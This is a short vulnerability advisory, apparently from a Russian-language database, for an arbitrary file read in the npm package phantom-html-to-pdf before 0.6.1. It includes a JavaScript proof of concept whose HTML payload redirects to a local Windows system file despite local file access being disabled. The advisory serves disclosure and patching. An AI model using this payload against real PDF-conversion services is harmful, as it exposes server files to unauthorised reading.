Описание
Arbitrary File Read in phantom-html-to-pdf
This affects the package phantom-html-to-pdf before 0.6.1.
PoC
var fs = require('fs') var conversion = require("phantom-html-to-pdf")();
conversion.allowLocalFilesAccess = false conversion({
html: "document.write(window.location='c:/windows/win.ini')"
}, function(err, pdf) {
var output = fs.createWriteStream('output.pdf') console.log(pdf.logs);
console.log(pdf.numberOfPages);
pdf.stream.pipe(output);
});
Пакеты
Наименование
phantom-html-to-pdf
npm
Затронутые версииВерсия исправления
< 0.6.1
0.6.2
Связанные уязвимости
CVSS3: 7.5
nvd
больше 5 лет назад
This affects the package phantom-html-to-pdf before 0.6.1.